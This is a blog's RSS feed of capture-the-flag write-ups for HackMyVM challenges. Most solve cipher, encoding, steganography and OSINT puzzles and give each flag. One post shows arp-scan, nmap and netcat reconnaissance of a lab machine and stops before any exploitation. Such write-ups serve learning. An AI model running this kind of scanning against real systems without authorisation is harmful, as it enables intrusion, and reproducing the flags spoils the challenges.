<?xml version='1.0' encoding='UTF-8'?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0"><channel><title>Triumph Blog</title><link>https://7r1UMPH.github.io</link><description>When your talent is not yet enough to match your ambition, you should calm down and study hard.</description><copyright>Triumph Blog</copyright><docs>http://www.rssboard.org/rss-specification</docs><generator>python-feedgen</generator><image><url>https://7r1umph.top/image/202506121404919.webp</url><title>avatar</title><link>https://7r1UMPH.github.io</link></image><lastBuildDate>Wed, 13 Aug 2025 16:25:42 +0000</lastBuildDate><managingEditor>Triumph Blog</managingEditor><ttl>60</ttl><webMaster>Triumph Blog</webMaster><item><title>Challenge 052</title><link>https://7r1UMPH.github.io/post/Challenge%20052.html</link><description>![image-20250622182158981](https://7r1umph.top/image/20250622182159297.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 052.zip                                                            
Archive:  052.zip
 extracting: 052.png                 
  inflating: 052.txt                 
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat 052.txt 
Good morning agent X,
You have been selected for another important mission.
You need to locate a persons flight and the airport were he arrived.
We were able to get the date from his cellphone, but it appears encrypted with some sofisticated technique,
Have a great hunt agent X,
Sh4dowExe

RCdgQV4/XVxJO3tGV1Z3UzRRdHIwYG9vSmw3WiInRERCQkFSYWFfdSl5W1p2b3RtM3FTaS9tbGVNaWhhJ2VeY1wiIV9eQFxbVFN3VzlPTk1McEpPSGxGS0RDZypAZD49QjtAPzhcNjU0WDgxNjU0MyxQKilNbm0lSUg1

P.S.
We, also, were able to retrieve this:
6tmc`F^ZgDA8*0&amp;i%-!lFWbX7EZf1:+ELt4F)N1CATVs2%178mA8*/sASl@'+Cf&gt;1DKU&amp;8+Cf&gt;-+D5_'DBNP&amp;EdD:J%16TYAKYf'+C\c$FD5&lt;(+CfG7A7]RoASuU$+Co1/Eb0?5D_;

I’m sure that with your capabilities you can solve it.                                                                                                                                                                                   
```

```
RCdgQV4/XVxJO3tGV1Z3UzRRdHIwYG9vSmw3WiInRERCQkFSYWFfdSl5W1p2b3RtM3FTaS9tbGVNaWhhJ2VeY1wiIV9eQFxbVFN3VzlPTk1McEpPSGxGS0RDZypAZD49QjtAPzhcNjU0WDgxNjU0MyxQKilNbm0lSUg1
```

I can't tell what it is yet; I tried XOR with no result.

Then I tried the attached one.

```
6tmc`F^ZgDA8*0&amp;i%-!lFWbX7EZf1:+ELt4F)N1CATVs2%178mA8*/sASl@'+Cf&gt;1DKU&amp;8+Cf&gt;-+D5_'DBNP&amp;EdD:J%16TYAKYf'+C\c$FD5&lt;(+CfG7A7]RoASuU$+Co1/Eb0?5D_;
```

It is base85.

![image-20250622205039316](https://7r1umph.top/image/20250622205039860.webp)

```
在这边，在那边，在那阴森的岩石上，
我看见长着角的魔鬼，手里拿着巨大的鞭子，
在后面残忍地鞭打着他们。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20052.html</guid><pubDate>Mon, 23 Jun 2025 14:08:04 +0000</pubDate></item><item><title>Challenge 051</title><link>https://7r1UMPH.github.io/post/Challenge%20051.html</link><description>![image-20250622181457506](https://7r1umph.top/image/20250622181505010.webp)

```
2zx42j1ji5x05cj64f2lt5zc56a6w0
```

CyberChef can't identify it, which means it isn't a common one.

dcode has a cipher identifier feature; let's try it.

https://www.dcode.fr/cipher-identifier

![image-20250622182033016](https://7r1umph.top/image/20250622182033489.webp)

https://www.dcode.fr/twin-hex-cipher

![image-20250622182054951](https://7r1umph.top/image/20250622182055419.webp)

```
HMV{4noth3r_C1pher}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20051.html</guid><pubDate>Mon, 23 Jun 2025 14:07:50 +0000</pubDate></item><item><title>Challenge 050</title><link>https://7r1UMPH.github.io/post/Challenge%20050.html</link><description>![image-20250621131043433](https://7r1umph.top/image/20250621131043717.webp)

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl -i http://momo.hackmyvm.eu/0r1g04szt0p/                
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sat, 21 Jun 2025 05:54:19 GMT
Content-Type: text/html
Content-Length: 317
Last-Modified: Sun, 02 Jun 2024 17:47:47 GMT
Connection: keep-alive
ETag: '665cb043-13d'
Accept-Ranges: bytes

&lt;!DOCTYPE html&gt;
&lt;html lang='en'&gt;
&lt;head&gt;
    &lt;meta charset='UTF-8'&gt;
    &lt;title&gt;HackMyVM - Sertor&lt;/title&gt;
    &lt;link rel='icon' href='logo.png' type='image/png' sizes='16x16'&gt;
    &lt;link href='index.css' type='text/css' rel='stylesheet'&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;p id='smoothkeyset'&gt;
    THIS LOOKS SO CLEAN!
&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;
 
 ┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl -i http://momo.hackmyvm.eu/0r1g04szt0p/logo.png                                              
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Sat, 21 Jun 2025 05:57:21 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive

&lt;html&gt;
&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;center&gt;&lt;h1&gt;404 Not Found&lt;/h1&gt;&lt;/center&gt;
&lt;hr&gt;&lt;center&gt;nginx/1.18.0&lt;/center&gt;
&lt;/body&gt;
&lt;/html&gt;
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl -i http://momo.hackmyvm.eu/0r1g04szt0p/index.css
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sat, 21 Jun 2025 05:57:39 GMT
Content-Type: text/css
Content-Length: 451
Last-Modified: Sun, 02 Jun 2024 17:48:30 GMT
Connection: keep-alive
ETag: '665cb06e-1c3'
Accept-Ranges: bytes

body
{
    background: rgb(123, 0, 128);
    background: linear-gradient(90deg, rgba(123, 0, 128, 1) 0%, rgba(205, 0, 187, 1) 34%, rgba(255, 0, 134, 1) 68%);
}

body #smoothkeyset
{
    position: absolute;
    right: 45vw;
    top: 45vh;

    color: white;
    font-family: 'Lucida Sans', 'dGhpc2lzbXlrZXkuY3NzLnR4dA==', sans-serif;
    font-size: large;
    font-style: italic;
    text-decoration: white underline solid 6px;
    cursor: default;
}

                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ echo dGhpc2lzbXlrZXkuY3NzLnR4dA== |base64 -d
thisismykey.css.txt                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl -i http://momo.hackmyvm.eu/0r1g04szt0p/thisismykey.css.txt
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sat, 21 Jun 2025 05:57:57 GMT
Content-Type: text/plain
Content-Length: 20
Last-Modified: Sun, 02 Jun 2024 17:48:38 GMT
Connection: keep-alive
ETag: '665cb076-14'
Accept-Ranges: bytes

HMV{wonderfulltext}
               
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20050.html</guid><pubDate>Sat, 21 Jun 2025 06:02:54 +0000</pubDate></item><item><title>Challenge 049</title><link>https://7r1UMPH.github.io/post/Challenge%20049.html</link><description>![image-20250621130059885](https://7r1umph.top/image/20250621130100186.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 049.zip 
Archive:  049.zip
  inflating: ourobouros              
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat ourobouros
(base64 output omitted)

┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat ourobouros|base64 -d &gt; our
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll our
-rwxr-xr-x 1 kali kali 7775 Jun 21 01:02 our
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ file our                               
our: PNG image data, 811 x 137, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ mv our our.png
                                  
```

![our](https://7r1umph.top/image/20250621130302644.webp)

Google it

![image-20250621130351324](https://7r1umph.top/image/20250621130351621.webp)

https://www.dcode.fr/pigpen-cipher

![image-20250621130909609](https://7r1umph.top/image/20250621130910070.webp)

The first one

```
HMV{NOTILLUMINATI}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20049.html</guid><pubDate>Sat, 21 Jun 2025 06:02:42 +0000</pubDate></item><item><title>Challenge 048</title><link>https://7r1UMPH.github.io/post/Challenge%20048.html</link><description>![image-20250621125632465](https://7r1umph.top/image/20250621125632761.webp)

Download and extract

![48](https://7r1umph.top/image/20250621125716382.webp)

Something that looks like a licence plate

Google it

![image-20250621125830400](https://7r1umph.top/image/20250621125830567.webp)

Ukraine

The first two letters are the **regional code of the place of registration**

AA is Kyiv

```
HMV{kyiv}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20048.html</guid><pubDate>Sat, 21 Jun 2025 06:02:28 +0000</pubDate></item><item><title>Challenge 047</title><link>https://7r1UMPH.github.io/post/Challenge%20047.html</link><description>![image-20250621124138454](https://7r1umph.top/image/20250621124138743.webp)

```
&lt;pre&gt; magic_num_list = [12, 43, 36, 47, 21, 40, 23, 42, 14, 54, 10, 53, 14, 36, 32, 40, 28, 50, 22, 40] Hint: Use python code for decoding the magic_num_list... &lt;/pre&gt;
```

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 47.zip 
Archive:  47.zip
  inflating: 47.py                   
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat 47.       
cat: 47.: No such file or directory
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat 47.py 
import string

def magic_encode(flag):
    flag, magic_num_list = divmod(flag, 61)
    return f'{string.digits[1:] + string.ascii_uppercase + string.ascii_lowercase}' [magic_num_list]                                                                                               
```

Base-61 mapping

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat 47p.py 
import string

base61_table = string.digits[1:] + string.ascii_uppercase + string.ascii_lowercase
magic_num_list = [12, 43, 36, 47, 21, 40, 23, 42, 14, 54, 10, 53, 14, 36, 32, 40, 28, 50, 22, 40]

decoded = ''.join(base61_table[i] for i in magic_num_list)
print(decoded)

┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ python3 $_
DibmMfOhFtBsFbXfTpNf
  
```

But when I submitted it, it was wrong.

So one possibility is that the order of the encoding table is off.

Let's just brute-force it.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat 47p.py
import string

magic_num_list = [12, 43, 36, 47, 21, 40, 23, 42, 14, 54, 10, 53, 14, 36, 32, 40, 28, 50, 22, 40]

tables = {
    'digits[1:] + uppercase + lowercase': string.digits[1:] + string.ascii_uppercase + string.ascii_lowercase,
    'digits + lowercase + uppercase': string.digits + string.ascii_lowercase + string.ascii_uppercase,
    'digits + uppercase + lowercase': string.digits + string.ascii_uppercase + string.ascii_lowercase,
    'uppercase + lowercase + digits': string.ascii_uppercase + string.ascii_lowercase + string.digits,
}

for name, table in tables.items():
    try:
        decoded = ''.join(table[i] for i in magic_num_list)
        print(f'{name} --&gt; {decoded}')
    except IndexError:
        print(f'{name} --&gt; IndexError: 表长度不足')

┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ python3 $_
digits[1:] + uppercase + lowercase --&gt; DibmMfOhFtBsFbXfTpNf
digits + lowercase + uppercase --&gt; cHALlEnGeSaReAwEsOmE
digits + uppercase + lowercase --&gt; ChalLeNgEsArEaWeSoMe
uppercase + lowercase + digits --&gt; MrkvVoXqO2K1OkgocyWo
                                                 
```

Try them one by one.

This one is correct: cHALlEnGeSaReAwEsOmE

```
HMV{cHALlEnGeSaReAwEsOmE}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20047.html</guid><pubDate>Sat, 21 Jun 2025 06:02:16 +0000</pubDate></item><item><title>Challenge 046</title><link>https://7r1UMPH.github.io/post/Challenge%20046.html</link><description>Nothing to do for now, so let's grind a few challenges.

![image-20250621073717593](https://7r1umph.top/image/20250621073717886.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 046.zip         
Archive:  046.zip
  inflating: 046.txt                 
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat -A 046.txt 
x=W0oyRmlZMlJsWm1kb2FXcHJiRzF1YjNCeGNuTjBkWFozZUhsNlFVSkRSRVZHUjBoSlNrdE1UVTVQVUZGU1UxUlZWbGRZV1ZvbklDZDZlWGgzZG5WMGMzSnhjRzl1Yld4cm;y=FtbG9aMlpsWkdOaVlWcFpXRmRXVlZSVFVsRlFUMDVOVEV0S1NVaEhSa1ZFUTBKQkp3bz0sIEhWMUR2M1FvQjNFYngyb2V5bTBQXQo=;x+y^M$
^M$
^M$
^M$
^M$
```

Looks like base64.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ echo -n 'W0oyRmlZMlJsWm1kb2FXcHJiRzF1YjNCeGNuTjBkWFozZUhsNlFVSkRSRVZHUjBoSlNrdE1UVTVQVUZGU1UxUlZWbGRZV1ZvbklDZDZlWGgzZG5WMGMzSnhjRzl1Yld4cm' | wc -c
130
          
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ echo -n 'FtbG9aMlpsWkdOaVlWcFpXRmRXVlZSVFVsRlFUMDVOVEV0S1NVaEhSa1ZFUTBKQkp3bz0sIEhWMUR2M1FvQjNFYngyb2V5bTBQXQo=' | wc -c                            
102
 
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ echo -n 'W0oyRmlZMlJsWm1kb2FXcHJiRzF1YjNCeGNuTjBkWFozZUhsNlFVSkRSRVZHUjBoSlNrdE1UVTVQVUZGU1UxUlZWbGRZV1ZvbklDZDZlWGgzZG5WMGMzSnhjRzl1Yld4cmFtbG9aMlpsWkdOaVlWcFpXRmRXVlZSVFVsRlFUMDVOVEV0S1NVaEhSa1ZFUTBKQkp3bz0sIEhWMUR2M1FvQjNFYngyb2V5bTBQXQo=' | base64 -d
[J2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVonICd6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYVpZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBJwo=, HV1Dv3QoB3Ebx2oeym0P]
  
```

J2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVonICd6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYVpZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBJwo=

HV1Dv3QoB3Ebx2oeym0P

Decode the first part first.

Then it gets a bit abstract

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ echo -n 'J2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVonICd6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYVpZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBJwo=' | base64 -d 
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' 'zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA'
```

This is clearly a **character mapping table**, i.e. one used for **simple substitution encryption**.

On the left is the plaintext character set (lowercase + uppercase):

```
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
```

On the right is the corresponding ciphertext mapping (i.e. reversed):

```
zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA
```

In other words, this is an **Atbash cipher**.

So you can take it straight to CyberChef.

![image-20250621123721248](https://7r1umph.top/image/20250621123721628.webp)

And that gives the flag.

```
HMV{recursion}
```
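The same chain carried out in code, as an added example that is not part of the original post: it takes the decoded mapping line and the second element of the x+y pair exactly as printed above, builds the substitution table from it, applies it to the ciphertext and base64-decodes the result. The function names are my own.

```python
import base64
import re

# Values as they appear on the page: the mapping line (still base64) and the
# second element of the decoded x+y pair, which is the substituted ciphertext.
TABLE_B64 = (
    "J2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVon"
    "ICd6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYVpZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBJwo="
)
CIPHERTEXT = "HV1Dv3QoB3Ebx2oeym0P"


def parse_table(table_line):
    """Parse a line of the form 'plain' 'cipher' into a cipher->plain dict.

    Characters absent from the table (the digits here) map to themselves.
    """
    quoted = re.findall(r"'([^']*)'", table_line)
    if len(quoted) != 2:
        raise ValueError("expected exactly two quoted alphabets")
    plain, cipher = quoted
    if len(plain) != len(cipher):
        raise ValueError("alphabets differ in length")
    return {c: p for p, c in zip(plain, cipher)}


def decode_table(table_b64):
    """base64 layer around the mapping line, as in the challenge file."""
    return parse_table(base64.b64decode(table_b64).decode())


def substitute(text, mapping):
    """Apply the substitution; unmapped characters pass through unchanged."""
    return "".join(mapping.get(ch, ch) for ch in text)


def is_atbash(mapping):
    """True when the table is the self-inverse alphabet reversal Atbash uses."""
    involution = all(mapping.get(v) == k for k, v in mapping.items())
    return involution and mapping.get("a") == "z" and mapping.get("A") == "Z"


def solve(table_b64, ciphertext):
    """Reproduce the chain: base64 -> substitution table -> Atbash -> base64."""
    mapping = decode_table(table_b64)
    inner = substitute(ciphertext, mapping)  # 'SE1We3JlY3Vyc2lvbn0K'
    return base64.b64decode(inner).decode().strip()


if __name__ == "__main__":
    print("table is Atbash:", is_atbash(decode_table(TABLE_B64)))
    print(solve(TABLE_B64, CIPHERTEXT))
```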

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20046.html</guid><pubDate>Sat, 21 Jun 2025 06:02:04 +0000</pubDate></item><item><title>内部_easyfmt</title><link>https://7r1UMPH.github.io/post/nei-bu-_easyfmt.html</link><description>![image-20250620183907687](https://7r1umph.top/image/20250620183915120.webp)

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ sudo arp-scan -l           
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:af:40:3a, IPv4: 192.168.205.206
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.205.1   00:50:56:c0:00:08       VMware, Inc.
192.168.205.2   00:50:56:f8:ba:aa       VMware, Inc.
192.168.205.139 08:00:27:7c:4c:12       PCS Systemtechnik GmbH
192.168.205.254 00:50:56:fd:86:ce       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.063 seconds (124.09 hosts/sec). 4 responded
                                   
```

The .139 host; let's enumerate its services.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ nmap -p- 192.168.205.139                 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-20 06:40 EDT
Nmap scan report for 192.168.205.139
Host is up (0.00016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste
MAC Address: 08:00:27:7C:4C:12 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.21 seconds
 
```

There's a port 1337; nc in and take a look.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ nc 192.168.205.139 1337 
welcome:Where is my password?
root:Well,it's in the stack,just find it.
```

Translate it

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ echo 'welcome:Where is my password?                  
root:Well,it's in the stack,just find it.' | trans -b :zh 2&gt;/dev/null
欢迎：我的密码在哪里？
root：嗯，它在堆栈中，只是找到它。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/nei-bu-_easyfmt.html</guid><pubDate>Fri, 20 Jun 2025 11:21:45 +0000</pubDate></item><item><title>Challenge 045</title><link>https://7r1UMPH.github.io/post/Challenge%20045.html</link><description>![image-20250617122237188](https://7r1umph.top/image/20250617122237544.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 045.zip                     
-rwxr-xr-x 1 kali kali 83848 Jun 17 00:22 045.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 045.zip 
Archive:  045.zip
  inflating: image.png               
     
```

![image](https://7r1umph.top/image/20250617122346695.webp)

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ 7z x 045.zip 

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 83848 bytes (82 KiB)

Extracting archive: 045.zip
--
Path = 045.zip
Type = zip
Physical Size = 83848

    
Would you like to replace the existing file:
  Path:     ./image.png
  Size:     79263 bytes (78 KiB)
  Modified: 2023-12-15 11:59:40
with the file from archive:
  Path:     image.png
  Size:     79263 bytes (78 KiB)
  Modified: 2023-12-15 11:59:39
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? Y

Everything is Ok

Size:       79263
Compressed: 83848
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ file 045.zip                                                                                                        
045.zip: Zip archive data, made by v6.3 UNIX, extract using at least v2.0, last modified Dec 15 2023 10:59:40, uncompressed size 79263, method=deflate
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ file image.png  
image.png: PNG image data, 304 x 481, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ exiftool image.png 
ExifTool Version Number         : 13.25
File Name                       : image.png
Directory                       : .
File Size                       : 79 kB
File Modification Date/Time     : 2023:12:15 10:59:39-05:00
File Access Date/Time           : 2025:06:17 00:24:11-04:00
File Inode Change Date/Time     : 2023:12:15 10:59:39-05:00
File Permissions                : -rwxr-xr-x
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 304
Image Height                    : 481
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Pixels Per Unit X               : 3780
Pixels Per Unit Y               : 3780
Pixel Units                     : meters
Image Size                      : 304x481
Megapixels                      : 0.146
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ stegseek image.png 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[!] error: the file format of the file 'image.png' is not supported.
                                   
```

Had a quick look with strings.

And verified with binwalk.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ binwalk 045.zip

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Zip archive data, at least v2.0 to extract, compressed size: 79069, uncompressed size: 79263, name: image.png
79108         0x13504         PNG image, 400 x 300, 8-bit/color RGBA, non-interlaced
79644         0x1371C         Zlib compressed data, best compression
83826         0x14772         End of Zip archive, footer length: 22

           
```

Something has been stuffed into it.

Tried binwalk, but it didn't work.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ binwalk --extract 045.zip

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Zip archive data, at least v2.0 to extract, compressed size: 79069, uncompressed size: 79263, name: image.png
79644         0x1371C         Zlib compressed data, best compression

WARNING: One or more files failed to extract: either no utility was found or it's unimplemented

                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cd _045.zip.extracted 
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx/_045.zip.extracted]
└─$ ls -al
total 650
drwxr-xr-x 1 kali kali      0 Jun 17 00:44 .
drwxr-xr-x 1 kali kali  16384 Jun 17 00:44 ..
-rwxr-xr-x 1 kali kali  83848 Jun 17 00:44 0.zip
-rwxr-xr-x 1 kali kali 480300 Jun 17 00:44 1371C
-rwxr-xr-x 1 kali kali   4204 Jun 17 00:44 1371C.zlib
-rwxr-xr-x 1 kali kali  79263 Dec 15  2023 image.png
                                      
```

那拿foremost试一下

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ foremost 045.zip       
Processing: 045.zip
���2��HȠm�I��R��u���2k��,��h�2���6m�}:�g�10d����^ܰьo��M�������׶���y�s�y����so�{M�{��(IHH�(��&amp;!!����7�O�R|��;�A���i������D��k�Of�M���
              +)���d���n�+����W�����
*|
           
```

???

Download it again.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ foremost 045.zip
ERROR: /mnt/hgfs/gx/output is not empty
        Please specify another directory or run with -T.
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ rm -rf /mnt/hgfs/gx/output
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ foremost 045.zip          
Processing: 045.zip
���2��HȠm�I��R��u���2k��,��h�2���6m�}:�g�10d����^ܰьo��M�������׶���y�s�y����so�{M�{��(IHH�(��&amp;!!����7�O�R|��;�A���i������D��k�Of�M���
              +)���d���n�+����W�����
*|
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cd output 
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx/output]
└─$ ls -al
total 21
drwxr-xr-x 1 kali kali  4096 Jun 17 00:47 .
drwxr-xr-x 1 kali kali 16384 Jun 17 00:47 ..
-rwxr-xr-x 1 kali kali   719 Jun 17 00:47 audit.txt
drwxr-xr-x 1 kali kali     0 Jun 17 00:47 png
drwxr-xr-x 1 kali kali     0 Jun 17 00:47 zip
                                   
```

OK, it was just my terminal's display problem.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx/output]
└─$ cd png       
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx/output/png]
└─$ ls -al
total 9
drwxr-xr-x 1 kali kali    0 Jun 17 00:47 .
drwxr-xr-x 1 kali kali 4096 Jun 17 00:47 ..
-rwxr-xr-x 1 kali kali 4618 Jun 17 00:47 00000154.png
                                   
```

![00000154](https://7r1umph.top/image/20250617125120923.webp)

```
HMV{undercover}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20045.html</guid><pubDate>Tue, 17 Jun 2025 04:56:16 +0000</pubDate></item><item><title>Challenge 044</title><link>https://7r1UMPH.github.io/post/Challenge%20044.html</link><description>![image-20250617121752851](https://7r1umph.top/image/20250617121753191.webp)

```
What type of format corresponds to the following address: bc1qspg3vsx3pphrf[...] Flag: HMV{format}
```

bc1 is the prefix format of a cryptocurrency (**Bitcoin**) address.

And addresses of this kind use the Bech32 encoding scheme.

```
HMV{Bech32}
```
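An added check, not from the challenge or any library, showing what the prefix of a bc1 address tells you and how the BIP173 bech32 checksum of a full address is verified. The address on the page is truncated, so only its prefix is parsed; the full address used in the code is the BIP173 test vector, and the bech32m constant from BIP350 is assumed for witness version 1 and above.

```python
# Bech32 address parsing and checksum verification (added example).
CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = [0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3]
BECH32_CONST = 1            # BIP173, used for witness version 0 (bc1q...)
BECH32M_CONST = 0x2BC830A3  # BIP350, used for witness version 1+ (bc1p...)
NETWORKS = {"bc": "Bitcoin mainnet", "tb": "Bitcoin testnet",
            "bcrt": "Bitcoin regtest"}


def bech32_polymod(values):
    """BIP173 BCH checksum polynomial over a list of 5-bit values."""
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk % 0x2000000) * 32) ^ v  # keep low 25 bits, shift in 5
        for i in range(5):
            if (top >> i) % 2:
                chk ^= GENERATOR[i]
    return chk


def hrp_expand(hrp):
    """Human-readable part expanded as the checksum expects it."""
    return [ord(c) >> 5 for c in hrp] + [0] + [ord(c) % 32 for c in hrp]


def describe_prefix(addr):
    """What the prefix alone reveals; works on the truncated address above."""
    addr = addr.lower()
    pos = addr.rfind("1")
    if pos in (-1, 0):
        raise ValueError("no hrp/data separator")
    hrp = addr[:pos]
    version = CHARSET.index(addr[pos + 1])
    kind = "SegWit v0, bech32" if version == 0 else "SegWit v%d, bech32m" % version
    return NETWORKS.get(hrp, "unknown network"), kind


def parse_bech32(addr):
    """Return (hrp, witness_version, checksum_ok) for a complete address."""
    if addr != addr.lower() and addr != addr.upper():
        raise ValueError("mixed case is not allowed")
    addr = addr.lower()
    pos = addr.rfind("1")
    if pos in (-1, 0) or pos + 7 > len(addr) or len(addr) > 90:
        raise ValueError("bad separator position or length")
    hrp, data_part = addr[:pos], addr[pos + 1:]
    if any(c not in CHARSET for c in data_part):
        raise ValueError("character outside the bech32 charset")
    data = [CHARSET.index(c) for c in data_part]
    version = data[0]
    expected = BECH32_CONST if version == 0 else BECH32M_CONST
    ok = bech32_polymod(hrp_expand(hrp) + data) == expected
    return hrp, version, ok


if __name__ == "__main__":
    print(describe_prefix("bc1qspg3vsx3pphrf"))  # prefix from the challenge
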